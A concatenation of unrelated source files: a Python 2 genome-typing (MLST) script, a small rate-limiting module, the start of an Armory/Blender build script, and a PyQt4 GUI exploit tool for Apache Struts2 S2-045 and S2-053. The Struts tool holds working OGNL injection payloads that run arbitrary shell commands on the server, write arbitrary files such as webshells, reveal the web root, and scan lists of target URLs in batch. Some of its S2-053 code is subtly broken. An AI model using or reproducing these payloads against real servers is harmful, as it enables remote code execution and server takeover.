intRefAllele = map(int, refAllele.split(" "))
# Create a string of the joined, sorted allleles
sortedRefAllele = " ".join(str(allele) for allele in sorted(intRefAllele))
else:
# Use the reference allele as the sortedRefAllele
sortedRefAllele = refAllele
for allele, percentID in bestDict[genome][gene].iteritems():
# If the allele for the gene in the query genome matches the allele in the reference profile,
# add the result to the bestMatch dictionary. Because genes with multiple alleles were sorted the
# same way, these strings with multiple alleles will match e.g. 10 692 will never be 692 10
if allele == sortedRefAllele:
# Increment the number of matches to each profile
bestMatch[genome][sequenceType] += 1
# Get the best number of matches
# From: https://stackoverflow.com/questions/613183/sort-a-python-dictionary-by-value
sortedMatches = sorted(bestMatch[genome].items(), key=operator.itemgetter(1), reverse=True)[0][1]
# If there are fewer matches than the total number of genes in the typing scheme
if int(sortedMatches) < header:
# Iterate through the sequence types and the number of matches in bestDict for each genome
for sequenceType, matches in bestMatch[genome].iteritems():
# If the number of matches for a profile matches the best number of matches
if matches == sortedMatches:
# Iterate through the gene in the analysis
for gene in profileData[sequenceType]:
# Get the reference allele as above
refAllele = profileData[sequenceType][gene]
# As above get the reference allele split and ordered as necessary
if len(refAllele.split(" ")) > 1:
intRefAllele = map(int, refAllele.split(" "))
sortedRefAllele = " ".join(str(allele) for allele in sorted(intRefAllele))
else:
sortedRefAllele = refAllele
# Populate the sequence type dictionary with the genome, best match to profile, number of
# matches to the profile, gene, query allele(s), reference allele(s), and percent identity
MLSTseqType[genome][sequenceType][sortedMatches][gene][str(bestDict[genome][gene].keys()[0])][sortedRefAllele] = str(bestDict[genome][gene].values()[0])
# Add the new profile to the profile file (if the option is enabled)
if updateProfile:
reProfilR(int(header), profileFile, geneList, genome)
# Otherwise, the query profile matches the reference profile
else:
# Iterate through best match
for sequenceType, matches in bestMatch[genome].iteritems():
if matches == sortedMatches:
for gene in profileData[sequenceType]:
# Populate resultProfile with the genome, best match to profile, number of
# matches to the profile, gene, query allele(s), reference allele(s), and percent identity
resultProfile[genome][sequenceType][sortedMatches][gene][str(bestDict[genome][gene].keys()[0])] = str(bestDict[genome][gene].values()[0])
dotter()
def reProfilR(numGenes, profileFile, geneList, genome):
"""Creates and appends new profiles as required"""
global MLSTseqType
global bestDict
global resultProfile
global profileData
profileNumber = 0
lastEntry = 0
newProfile = ""
# Iterate through MLSTseqType - it contains genomes with partial matches to current reference profiles
# for genome in MLSTseqType:
# Reset newProfile
newProfile = ""
# Find the last profile entry in the dictionary of profiles
# Opens uses the command line tool 'tail' to look at the last line of the file (-1). This last line
# is split on tabs, and only the first entry (the sequence type number) is captured
profile = subprocess.check_output(['tail', '-1', profileFile]).split("\t")[0]
# Split the _CFIA from the number - if there is no "_", the just use profile as the profile number
try:
profileNumber = int(profile.split("_")[0])
except IndexError:
profileNumber = int(profile)
# If the number is less than 1000000, then new profiles have not previously been added
if profileNumber < 1000000:
# Set the new last entry number to be 1000000
lastEntry = 1000000
# If profiles have previously been added
else:
# Set last entry to the highest profile number plus one
lastEntry = profileNumber + 1
# As there can be multiple profiles in MLSTSeqType, this loop only needs to be performed once.
seqCount = 0
# Go through the sequence types
for sequenceType in MLSTseqType[genome]:
# Only do this once
if seqCount == 0:
# Set the newProfile string to start with the new profile name (e.g. 1000000_CFIA)
newProfile = "%s_CFIA" % str(lastEntry)
# The number of matches to the reference profile
for numMatches in MLSTseqType[genome][sequenceType]:
# The genes in geneList - should be in the correct order
for gene in geneList:
# The allele for each gene in the query genome
for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
# Append the allele to newProfile
newProfile += "\t%s" % str(allele)
# Add the MLST results for the query genome as well as the new profile data to resultProfile
resultProfile[genome]["%s_CFIA" % str(lastEntry)][numGenes][gene][allele] = MLSTseqType[genome][sequenceType][numMatches][gene][allele].values()[0]
seqCount += 1
# Only perform the next loop if newProfile exists
if newProfile:
# Open the profile file to append
appendFile = open(profileFile, "ab")
# Append the newProfile to the end of the profile file
appendFile.write("%s\n" % newProfile)
# Close the profile file
appendFile.close()
# Remove the .json file with the old profile information
jsonProfile = "%s.json" % os.path.splitext(profileFile)[0]
try:
os.remove(jsonProfile)
except OSError:
# If there are multiple new profiles, then this will be unable to delete the file each time; allow a pass
pass
# Re-run profilR with the updated files
profilR(profileFile)
def blaster(path, cutoff, sequencePath, targetPath, organismPath, scheme, organism):
"""
The blaster function is the stack manager of the module
markers are the the target fasta folder that with be db'd and BLAST'd against strains folder
out is the working directory where the blastxml folder will be placed
name is the partial title of the csv output
ALL PATHS REQUIRE TRAILING SLASHES!!!
"""
# Time is used to calculate length of the analyses
start = time.time()
# Import global variables
global count, genedict, blastpath, plusdict, updateProfile
# Initialise genedict
genedict = defaultdict(list)
blastpath = []
# Run organism chooser to allow the user to choose which databases to use
# returns the organism name, lists of alleles and the profile
alleles, profile, organismName, schemeName, profileFile = organismChooser(path, targetPath, organismPath, scheme, organism)
print "[%s] Reading sequence profiles" % (time.strftime("%H:%M:%S"))
profileDict, geneList = profilR(profileFile)
# reset count to 0
count = 0
# Get the genome files into a list - note that they must be in the "sequences" subfolder of the path,
# and the must have a file extension beginning with ".fa"
strains = glob("%s*.fa*" % sequencePath)
# # Create the threads for the BLAST analysis
for i in range(len(strains)):
threads = runblast(blastqueue)
threads.setDaemon(True)
threads.start()
print "\n[%s] Creating necessary databases for BLAST" % (time.strftime("%H:%M:%S"))
# Push targets to threads
makedbthreads(alleles)
print "\n[%s] Performing and parsing BLAST database searches" % (time.strftime("%H:%M:%S"))
# reset count to 0
count = 0
# Make blastn threads and retrieve xml file locations
blastnthreads(alleles, strains, cutoff)
# reset count to 0
count = 0
print "\n[%s] Determining sequence types" % (time.strftime("%H:%M:%S"))
# Determine sequence types
sequenceTyper(profileDict, profileFile, geneList, updateProfile)
# Parse the results into a report
csvheader = ''
# # Initialise variables
row = ""
rowcount = 0
# Make the reports folder if necessary
make_path("%sreports" % path)
# Open the csv report - add the organism name, the scheme name and the date to keep reports unique
with open("%sreports/%s_%s_results_%s.csv" % (path, organismName, schemeName, time.strftime("%Y.%m.%d.%H.%M.%S")), 'wb') as csvfile:
# Get the header started
csvheader = "Strain,SequenceType,Matches,"
# Initialise the headerGenes variable
headerGenes = ''
for gene in geneList:
# Append each gene to headerGenes
headerGenes += "%s," % gene
# Append headerGenes to the header
csvheader += headerGenes
# Write the header to the report
csvfile.write(csvheader)
# Iterate through all the query genomes
for genome in plusdict:
# Reset resultString to a newline
resultString = "\n"
# Reset the counts to 0
sequenceTypeCount = 0
resProfileCount = 0
# If the genome is in resultProfile
if genome in resultProfile:
# If, as is the case for cgMLST, there are multiple identical profiles, then, the formatting of the
# report is automatically changed
if len(resultProfile[genome]) == 1:
# Iterate through the sequence types
for sequenceType in resultProfile[genome]:
# Put the genome and the sequence type in the result string
resultString += "%s,%s, " % (genome, sequenceType)
# Report the number of matches to the profile
for numMatches in resultProfile[genome][sequenceType]:
# Append these matches
resultString += "%s," % numMatches
# Go through the ordered list of genes
for gene in geneList:
# Add each allele to the result string
for allele in resultProfile[genome][sequenceType][numMatches][gene]:
# If there is a 100% match or a 0% match (in case of an N), do not print the percent identity
if float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 100 \
or float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 0:
resultString += "%s," % allele
# Otherwise add the percent identity following the allele
else:
resultString += "%s (%s%%)," % (allele, resultProfile[genome][sequenceType][numMatches][gene][allele])
# Append the resultString to the report
csvfile.write(resultString)
# If there are more than one identical profile
else:
# Same as above, but only add the genome on the first line
for sequenceType in resultProfile[genome]:
# First sequence type
if resProfileCount == 0:
resultString += "%s,%s, " % (genome, sequenceType)
for numMatches in resultProfile[genome][sequenceType]:
resultString += "%s," % numMatches
for gene in geneList:
for allele in resultProfile[genome][sequenceType][numMatches][gene]:
if float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 100 \
or float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 0:
resultString += "%s," % allele
else:
resultString += "%s (%s%%)," % (allele, resultProfile[genome][sequenceType][numMatches][gene][allele])
resProfileCount += 1
csvfile.write(resultString)
# Subsequent sequence types
else:
resultString = "\n,"
resultString += "%s," % sequenceType
for numMatches in resultProfile[genome][sequenceType]:
resultString += "%s," % numMatches
for gene in geneList:
for allele in resultProfile[genome][sequenceType][numMatches][gene]:
if float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 100 \
or float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 0:
resultString += "%s," % allele
else:
resultString += "%s (%s%%)," % (allele, resultProfile[genome][sequenceType][numMatches][gene][allele])
resProfileCount += 1
csvfile.write(resultString)
# The option to not update the profiles is optionally available, so do the same as above, but for genomes
# that lack a perfect match to a reference profile
# I'm not commenting here, as this is essentially identical to the code above. Ideally, I should find a
# way to get this into a reusable function.
else:
if len(MLSTseqType[genome]) == 1:
for sequenceType in MLSTseqType[genome]:
resultString += "%s,%s," % (genome, sequenceType)
for numMatches in MLSTseqType[genome][sequenceType]:
resultString += "%s," % numMatches
for gene in geneList:
for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
for refAllele in MLSTseqType[genome][sequenceType][numMatches][gene][allele]:
if allele == refAllele:
if float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 100 \
or float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 0:
resultString += "%s," % allele
else:
resultString += "%s (%s%%)," % (allele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
# Since there are mismatches, show the expected allele in the reference profile
else:
resultString += "%s (%s - %s%%)," % (allele, refAllele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
csvfile.write(resultString)
else:
for sequenceType in MLSTseqType[genome]:
if sequenceTypeCount == 0:
resultString += "%s,%s," % (genome, sequenceType)
for numMatches in MLSTseqType[genome][sequenceType]:
resultString += "%s," % numMatches
for gene in geneList:
for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
for refAllele in MLSTseqType[genome][sequenceType][numMatches][gene][allele]:
if allele == refAllele:
if float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 100 \
or float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 0:
resultString += "%s," % allele
else:
resultString += "%s (%s%%)," % (allele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
else:
resultString += "%s (%s - %s%%)," % (allele, refAllele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
sequenceTypeCount += 1
csvfile.write(resultString)
else:
resultString = "\n,"
resultString += "%s," % sequenceType
for numMatches in MLSTseqType[genome][sequenceType]:
resultString += "%s," % numMatches
for gene in geneList:
for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
for refAllele in MLSTseqType[genome][sequenceType][numMatches][gene][allele]:
if allele == refAllele:
if float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 100 \
or float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 0:
resultString += "%s," % allele
else:
resultString += "%s (%s%%)," % (allele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
else:
resultString += "%s (%s - %s%%)," % (allele, refAllele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
sequenceTypeCount += 1
csvfile.write(resultString)
# File cleanup
tmpFiles = glob("%stmp/*" % path)
for tmpFile in tmpFiles:
try:
os.remove(tmpFile)
except OSError:
raise
# Calculate the elapsed time
end = time.time() - start
# Friendly exit statement
print "\n[%s] Elapsed time for GeneSeeking is %.2f seconds with %.2f seconds per genome" \
% (time.strftime("%H:%M:%S"), end, end/float(len(strains)))
# Run the blaster function
blaster(path, cutoff, sequencePath, allelePath, organismPath, scheme, organism) |
st2-045.pyw | # -*- coding: utf-8 -*-
from ui import Ui_MainWindow,_translate,_fromUtf8
from PyQt4 import QtCore, QtGui
import requests
import sys,threading
class Ognl(object):
dm = "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
mb = "(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
md = "(#c='{cmd}').(#i=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#md=(#i?{'cmd.exe','/c',#c}:{'/bin/bash','-c',#c}))"
ps = "(#ps=new java.lang.ProcessBuilder(#md))(#ps.redirectErrorStream(true)).(#pr=#ps.start()).(#rs=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#pr.getInputStream(),#rs)).(#rs.flush())"
fw = "(#fw=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('{path}')))).(#fw.write('{content}')).(#fw.flush()).(#fw.close())"
rs = "(#rs=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#rs)).(#rs.flush())"
def __init__(self,base=''):
self.base = base
self.payload = []
def make(self,it='.'):
return self.filter(it.join(self.payload))
@classmethod
def filter(self,s):
return s
class StrutsBase(object):
method = "STRUTS"
req = requests.Session()
proxies = {}
auth = ()
timeout = 60
url = None
webpath = None
headers = {
'Cookie' : 'STRUTS-Cookie',
'User-Agent': 'STRUTS-Ua',
'Accept' : 'text/html',
'Connection': 'close'
}
def __init__(self):
self.data = {}
def set_data(self,k,v):
self.data[k] = v
@classmethod
def set_header(self,k,v):
self.headers[k] = v
def send(self,url=None,data=None,headers=None,ref=True):
if ref:self.headers['Referer'] = url
return self.req.post(
url = url if url else self.url,
data = data if data else self.data,
headers = headers if headers else self.headers,
proxies = self.proxies,
auth = self.auth,
timeout = self.timeout,
verify=False)
def poc(self,url=None):
return
def exp(self,cmd):
return 'exp'
def upload(self,path,content='testst2',encoding='UTF-8'):
return
def getpath(self):
return 'getpath'
class Struts2045(StrutsBase):
def poc(self,url=None):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#r=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#r.println('STRUTStest'+20+45))"
".(#r.close())}")
self.set_header('Content-Type',payload)
res = self.send(url=url).text
return 'STRUTStest2045' in res
def exp(self,cmd):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#c='"+cmd+"')"
".(#i=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
".(#s=(#i?{'cmd.exe','/c',#c}:{'/bin/bash','-c',#c}))"
".(#p=new java.lang.ProcessBuilder(#s))"
".(#p.redirectErrorStream(true)).(#process=#p.start())"
".(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))"
".(#r.flush())}")
self.set_header('Content-Type',payload)
return self.send().text
def exp1(self,cmd):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
".(#o=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
".(#o.getExcludedPackageNames().clear())"
".(#o.getExcludedClasses().clear())"
".(#context.setMemberAccess(#dm))))"
".(#cmd='"+cmd+"')"
".(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))"
".(#p=new java.lang.ProcessBuilder(#cmds))"
".(#p.redirectErrorStream(true)).(#process=#p.start())"
".(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))"
".(#r.flush())}")
self.set_header('Content-Type',payload)
return self.send().text
def upload(self,path,content,encoding='UTF-8'):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#w=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#f=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('"+path+"'))))"
".(#f.write('"+content+"'))"
".(#f.flush())"
".(#f.close())"
".(#w.print('STRUTStest'+20+45)"
".(#w.close()))}")
self.set_header('Content-Type',payload)
res = self.send().text
return 'STRUTStest2045' in res
def upload1(self,path,content,encoding='UTF-8'):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
".(#o=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
".(#o.getExcludedPackageNames().clear())"
".(#o.getExcludedClasses().clear())"
".(#context.setMemberAccess(#dm))))"
".(#w=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#f=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('"+path+"'))))"
".(#f.write('"+content+"'))"
".(#f.flush())"
".(#f.close())"
".(#w.print('STRUTStest'+20+45)"
".(#w.close()))}")
self.set_header('Content-Type',payload)
res = self.send().text
return 'STRUTStest2045' in res
def getpath(self):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#r=@org.apache.struts2.ServletActionContext@getRequest().getRealPath('/'))"
".(#o.println(#r))"
".(#o.close())}")
self.set_header('Content-Type',payload)
res = self.send().text
return res.strip()
class Struts2053(StrutsBase):
"""%25{(%23dm=@ogn1.OgnIContext@DEFAULT_MEMBER_ACCESS).(%23_memberAccess?(%23_memberAccess=%23dm):((%23container=%23context ['com.opensymphony.xwork2.ActionContext.container'])(%23ogn1util=%23container.getInstance(@com.opensymphony.xwork2.ogn1.ognlUtil@class) ).(%23ogn1Util.getExcludedPackageNames().clear()).(%23ogn1Util.getExcludedClasses( ).clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd='whoami').(%23cmds={'cmd.exe','/c',%23cmd}).(%23p=new java.lang.ProcessBuilder(%23cmds))(%23p.redirectErrorStream(true)).(%23process=%23p.start()).(%23ins=%23process.getInputStream()).(@org.apache.commons.io.IOUtils@toString(%23ins,'UTF-8'))}"""
def poc(self,url=None):
payload = ("%{987654321-1234567}")
url = "?redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return '986419754' in res
def exp(self,cmd):
payload = ("%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#c='"+cmd+"')"
".(#i=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
".(#s=(#i?{'cmd.exe','/c',#c}:{'/bin/bash','-c',#c}))"
".(#p=new java.lang.ProcessBuilder(#s))"
".(#p.redirectErrorStream(true)).(#process=#p.start())"
".(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))"
".(#r.flush())}").replace('%','%25').replace('#','%23')
url = "?redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return 'STRUTStest2053' in res
def upload(self,path,content,encoding='UTF-8'):
payload = ("%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#w=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#f=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('"+path+"'))))"
".(#f.write('"+content+"'))"
".(#f.flush())"
".(#f.close())"
".(#w.print('STRUTStest'+20+53)"
".(#w.close()))}").replace('%','%25').replace('#','%23')
url = "?=redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return 'STRUTStest2053' in res
def getpath(self):
payload = ("%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#r=@org.apache.struts2.ServletActionContext@getRequest().getRealPath('/'))"
".(#o.println(#r))"
".(#o.close())}").replace('%','%25').replace('#','%23')
url = "?redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return 'STRUTStest2053' in res
class QIterThread(QtCore.QThread):
def __init__(self):
QtCore.QThread.__init__(self)
self.Queue = []
self.threads = 10
self.timeout = 10
self.__FLAG = True #stop
self.__STAT = False #pause
def run(self):
if self.Queue and self.handler:
self.__FLAG = True
self.__STAT = False
Qiter = iter(self.Queue)
while self.__FLAG:
__ = []
if self.__STAT:
self.sleep(1)
continue
for _ in range(self.threads):
try:
data = next(Qiter)
except StopIteration:
self.__FLAG = False
break
_Q = threading.Thread(target=self.handler,args=(data,))
__.append(_Q)
for _ in __:
_.start()
def stop(self):
self.__FLAG = False
self.__STAT = False
def pause(self):
self.__STAT = not self.__STAT
def setup(self,**kwargs):
for k,v in kwargs.items():
setattr(self,k,v)
class EventHandler(QtGui.QMainWindow,Ui_MainWindow):
@QtCore.pyqtSlot(str)
def on_lineEdit_url_textChanged(self,event):
if not str(event).startswith(('http','HTTP')):
event='http://%s'%event
StrutsBase.url = event
self.updatestatus(u'更改URL地址为%s'%event)
@QtCore.pyqtSlot(bool)
def on_pushButton_info_clicked(self,event):
if StrutsBase.url:
self.text_info.setText('')
for name,mod in self.mods.items():
self.updatestatus(u'正在测试是否存在%s漏洞。'%name)
if mod.poc():
self.curmod = mod
self.text_info.insertPlainText(u'发现%s漏洞!!!系统确定为%s漏洞模式.!\n'%(name,name))
else:
self.text_info.insertPlainText(u'未发现%s漏洞\n'%name)
self.updatestatus(u'')
@QtCore.pyqtSlot(bool)
def on_pushButton_cmd_clicked(self,event):
if self.curmod:
self.text_cmd.setText(self.curmod.exp(self.lineEdit_cmd.text()))
else:
self.updatestatus(u'请先确定使用的漏洞模式')
@QtCore.pyqtSlot(bool)
def on_pushButton_allload_clicked(self,event):
folder = QtGui.QFileDialog.getOpenFileName(None,u"选择导入的地址文件",'',"*.*")
if folder:
self.treeWidget.clear()
inFile = QtCore.QFile(folder)
if inFile.open(QtCore.QIODevice.ReadOnly):
stream = QtCore.QTextStream(inFile)
i = 1
while not stream.atEnd():
line = stream.readLine()
item = QtGui.QTreeWidgetItem()
item.setText(0,str(i))
item.setText(1,_fromUtf8(line))
item.setText(2,_fromUtf8(u'待验证'))
self.treeWidget.addTopLevelItem(item)
i += 1
self.lineEdit_all.setText(folder)
self.updatestatus(u'文件导入成功')
@QtCore.pyqtSlot(bool)
def on_pushButton_alltest_clicked(self,event):
item = QtGui.QTreeWidgetItemIterator(self.treeWidget)
items = []
while item.value():
items.append(item.value())
item = item.__iadd__(1)
#多线程
self.allverify.setup(Queue = items,handler=self.allverify_event)
self.allverify.start()
self.updatestatus(u'开始批量验证')
@QtCore.pyqtSlot(bool)
def on_pushButton_allstop_clicked(self,event):
self.allverify.stop()
self.updatestatus(u'停止批量验证')
@QtCore.pyqtSlot(bool)
def on_pushButton_allexport_clicked(self,event):
item = QtGui.QTreeWidgetItemIterator(self.treeWidget)
csv = []
while item.value():
csv.append(','.join([item.value().text(0),item.value().text(1),item.value().text(2)]))
item = item.__iadd__(1)
filename = QtGui.QFileDialog.getSaveFileName(None,u"保存文件",'',"*.csv")
if filename:
with open(filename,'w') as f:
f.write('\n'.join(csv))
f.close()
self.updatestatus(u'文件导出成功。%s'%filename)
@QtCore.pyqtSlot(QtGui.QTreeWidgetItem,int)
def on_treeWidget_itemDoubleClicked(self,item,i):
url = str(item.text(1)).strip()
self.lineEdit_url.setText(url)
StrutsBase.url = url
self.updatestatus(u'选择URL地址%s'%url)
@QtCore.pyqtSlot(bool)
def on_pushButton_getpath_clicked(self,event):
if self.curmod:
self.lineEdit_upload.setText(self.curmod.getpath())
else:
self.updatestatus(u'请先确定使用的漏洞模式')
@QtCore.pyqtSlot(bool)
def on_pushButton_upload_clicked(self,event):
if self.curmod:
path = self.lineEdit_upload.text()
path = str(path).strip().replace('\\','/')
content = self.text_upload.toPlainText()
if self.curmod.upload(path,content):
self.updatestatus(u'上传成功')
else:
self.updatestatus(u'上传失败')
else:
self.updatestatus(u'请先确定使用的漏洞模式')
@QtCore.pyqtSlot(str)
def on_comboBox_mod_activated(self,event):
if event in self.mods.keys():
self.curmod = self.mods[str(event)]
self.updatestatus(u'手动切换为%s漏洞模式'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_proxyhost_textChanged(self,event):
host = self.lineEdit_proxyhost.text()
port = self.lineEdit_proxyport.text()
StrutsBase.proxies = {'http':'http://%s:%s'%(host,port),'https':'http://%s:%s'%(host,port)}
self.updatestatus(u'更改代理地址为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_proxyport_textChanged(self,event):
host = self.lineEdit_proxyhost.text()
port = self.lineEdit_proxyport.text()
StrutsBase.proxies = {'http':'http://%s:%s'%(host,port),'https':'http://%s:%s'%(host,port)}
self.updatestatus(u'更改代理端口为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_authname_textChanged(self,event):
name = self.lineEdit_authname.text()
pwd = self.lineEdit_authpwd.text()
StrutsBase.auth = (name,pwd)
self.updatestatus(u'更改认证用户为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_authpwd_textChanged(self,event):
name = self.lineEdit_authname.text()
pwd = self.lineEdit_authpwd.text()
StrutsBase.auth = (name,pwd)
self.updatestatus(u'更改认证密码为%s'%event)
@QtCore.pyqtSlot()
def on_plainTextEdit_cookie_textChanged(self):
event = self.plainTextEdit_cookie.toPlainText()
StrutsBase.set_header('Cookie',event)
self.updatestatus(u'更改COOKIE为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_ua_textChanged(self,event):
StrutsBase.set_header('User-Agent',event)
self.updatestatus(u'更改UA头为%s'%event)
@QtCore.pyqtSlot(int)
def on_spinBox_threads_valueChanged(self,event):
self.allverify.setup(threads=event)
self.updatestatus(u'更改线程数为%s'%event)
class GuiMain(EventHandler):
signal_status = QtCore.pyqtSignal(str)
def __init__(self):
super(EventHandler, self).__init__()
self.setupUi(self)
self.treeWidget.header().setResizeMode(QtGui.QHeaderView.ResizeToContents)
#禁止最大化
self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
#禁止拉伸窗口
self.setFixedSize(self.width(), self.height())
self.signal_status.connect(self.updatestatus)
self.mods = {}
self.curmod = None
for i,mod in enumerate(StrutsBase.__subclasses__()):
self.mods[mod.__name__] = mod()
self.comboBox_mod.addItem(_fromUtf8(mod.__name__))
self.allverify = QIterThread()
#QtCore.QMetaObject.connectSlotsByName(self)
def updatestatus(self,msg):
self.statusBar.showMessage(msg)
def allverify_event(self,item):
try:
url = item.text(1)
item.setText(2,_fromUtf8(u'未发现漏洞'))
for name,mod in self.mods.items():
if mod.poc(url=str(url).strip()):
item.setText(2,'%s'%name)
item.setBackgroundColor(0,QtGui.QColor("#ff0000"))
item.setBackgroundColor(1,QtGui.QColor("#ff0000"))
item.setBackgroundColor(2,QtGui.QColor("#ff0000"))
except Exception as e:
self.updatestatus(str(e))
def main():
app = QtGui.QApplication(sys.argv)
mainWindow = GuiMain()
mainWindow.show()
sys.exit(app.exec_())
main() |
message.py | import queue
import threading
import time
rateLimit = []
rateLimitQueue = queue.Queue()
def cooldown_add(user, cooldown_amount=3600):
rateLimitQueue.put((user, time.time()+cooldown_amount))
rateLimit.append(user)
def deleteLimit():
while True:
if rateLimitQueue.empty == True:
time.sleep(1)
else:
latest = rateLimitQueue.get()
current = round(time.time())
expires = latest[1]
if current >= expires:
rateLimit.pop(0)
continue
else:
time.sleep(expires-current)
rateLimit.pop(0)
rateLimitThread = threading.Thread(target=deleteLimit)
rateLimitThread.start() |
make.py | import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
